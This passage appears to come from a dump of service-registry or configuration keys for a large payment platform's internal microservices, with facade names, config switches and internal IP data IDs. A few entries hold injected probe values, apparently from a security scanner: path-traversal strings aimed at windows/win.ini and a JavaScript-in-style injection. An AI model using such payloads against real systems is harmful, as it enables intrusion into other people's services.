SOFA","Alipay.riskmng:name=com.alipay.infosec.biz.manager.drm.InfosecmngSharedResource.resolveByHoloxmng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.StockPlanAuditManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","finriskmngcore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.11.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.97.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finprodcenter.common.service.facade.BorrowerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanDecisionLogThreadPool.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkmobileappcommon.common.service.testgo.apkinfo.ApkInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:merchantRiskConsultValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imatchfacade.common.service.facade.delivery.AdGroupApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.80.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.alive.ProdALiveMarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.biz.service.impl.manage.ConfigurationManagementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.ScenePrivacyQuestionManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-amlcloud-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insmobile.common.service.userhome.UserHomeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.AuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.StockCompanyBusinessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.dimtable.HainaDimTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.org.InternalStaffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushThirdMultipleTemplateGzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.mortgage.facade.RiskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.FenleibaoHttpRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.30.192.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.biz.service.drm.InsConfigDRMSevice.configItem,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2 e\\\\windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_UNIBENCH#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwd4541.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.scienguide.ScoreRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.devapi.facade.ToolDictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.workBenchTairTimeOutSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databizcore.common.service.facade.identification.IdentificationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.acctrans.AcctransListenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.SocialProfileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransPaymentFinalizer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.69.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilitycore.facade.api.JsApiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.api.mdatasync.MdatasyncRZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchcore.common.service.facade.domain.service.MatchDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.161.40.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_zmSubAuditProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.closeShadow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_CATERING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.SecurityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcinstassetmng_canceledProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.97.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.rule.core.engine.config.RuleEngineResource.ruleDomainConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityprod.commom.service.facade.CharityMixedItemGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.129.253#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.overseamerchant.api.OSMerchanttransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkkycprod.common.service.facade.trust.questionaire.service.DualRecordQuestionaireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_ruleDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenterprod.core.service.component.GlobalSequenceComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincapacity.biz.facade.PaymentSimulationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.46.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.updateBannerJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mychain.baas.common.user.service.FeatureActivationCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promomng.common.service.integration.maplatform.CampApprClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.TaskManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacportal.biz.casemanage.service.CaseListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.profile.facade.PositionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.isasp.service.facade.psbp.InsuranceCardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.WorkDayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.unRefreshTimePeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uioservice.common.service.facade.api.MaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:libracore.product.INVEST_DECISION@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.starWishFundAssetQueryOpenMockConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.GroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mremindprod.common.service.facade.TagBelongedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:zmcustbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.abilitycore.facade.api.JsApiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventRelatedEntityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_MPA_INTERNAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:forexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.life.LifeMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.spi.bc.BcBusinessInfoFacade:1.0:multimediabase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreconcenter.common.service.facade.api.CalendarBillSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_zdtrans_schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cdp.common.spi.creative.service.CdpSpiService:1.0:finfocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofademo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.ProxyAdaptConfigCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.news.NewsListQueryV30Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:finresprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.CustomerInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.capitalflow.CapitalFlowManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_SCHENOTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.MerchantContactPersonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdeclarecenter.facade.service.ReportIndexQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mrchportalcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.inshealthcore.common.service.facade.api.asset.HealthAssetCouponQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bkfundportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.support.isc.IscStabilityScoreTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.merchant.facade.ProxyOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.innerClientStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.117.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiswisdom.topology.common.service.facade.api.subtopology.SubTopologyOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.xts.BenefitExchangeTwoPhasesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArBillAdjustOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.252.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.EbppService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.dashboard.DashboardService:1.0:old@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.decorate.AutoDecorateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.DeleteDataSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.extension.service.facade.api.MerchantActivityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.biz.odps.OdpsOperationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsEndorsementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotetradecore.common.service.facade.api.KLineManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membertangram.common.service.facade.config.ConfigSimpleService:1.0:applicationConfigSimpleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.SnsServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dmpservice.common.service.facade.crowd.CrowdServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dispatchcore:name=com.shangshu.dispatchcore.core.drm.BizControlImpl.bizJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:definprodcenter_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.datacontext.common.service.facade.bizcontext.api.FcBizContextService:1.0:fcdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.AppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:msfluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.data.process.facade.operationrecord.DataProcessOperationRecordService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.SyncUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.newSgwRouterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.revol.drm.RepoConfig.reloadTrigger,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_DAYU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clearingcenter.facade.api.ClearingTimeRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.maxCrowdNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniselfop.facade.api.miniplan.MiniPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.MerchantLabelBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcapplycore.common.service.facade.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iotcms@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.61.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.sandboxhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.pucprod.EbppOfflineInstServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardCreditQuotaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.common.service.item.facade.score.ItemScoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.merchant.MerchantGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.SceneDataSyncDrmImpl.errorSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.mordercenter.KouBeiStagedPaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insautoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.keyEvent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.midas.service.facade.api.ChangeDescriptorTraceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.prodmng.core.service.drm.impl.SalesPlanCompanyChangeDRMImpl.companyCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.depcore.service.facade.DepositTransferCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkpromofront.facade.duosaoduode.api.DuoSaoDuoDeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchcore.common.service.facade.match.service.TimingMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.common.service.integration.antmember.AntMemberServiceSwitchDrm.cooperatePlantServiceSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_COMMUNITYMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.PreCreateOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.config.ConfigSimpleService:1.0:eventTaskConfigSimpleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.SubwayServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_MPA_INTERNAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\" style=\"background:url(javascript:alert('antscanGIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZDFMRWGG3T2MI------'))\" \"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.taskflow.repo.YebcAccessRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.newsync.NewsDataSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.ps.rpc.facade.UserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.validator.impl.ValidatorConfigDRMResource.switchRiskCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_ASSET_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:caprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetcore.common.service.assetcore.zcb.facade.ZCBStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.localgateway.facade.api.LocalGatewayMaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.auditprod.common.service.facade.fund.domain.QueryCategory:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.interstellar.common.service.facade.api.FinancialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:finfundcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.ArOperationSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finadvisorprod.common.service.facade.api.AdvisorNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.HypCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.OracleDepositInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.hbpoint.HbPointAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.186.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscprod.facade.watchlist.HeadlineNewsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.amap.AmapQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.MsgDispatchService:1.0:linglongDefault@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.quality.facade.QualityResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pointcore.facade.api.point.PointFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.college.material.MaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.api.RrpcConfigApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmAccenterCategoriesConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_FAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dataqualitytestsvr.common.facade.DataMockSvrOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.CountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvoice.facade.invoice.InvoiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.instserviceconfig.IscChainProcessorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_KBSECURITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinquotationprod.common.service.facade.api.ResearchReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.communityshare:name=com.alipay.mobilecommunity.biz.community.drm.CommunityShareCfgResource.globalAuditConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_PLEDGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certifymng.service.facade.Common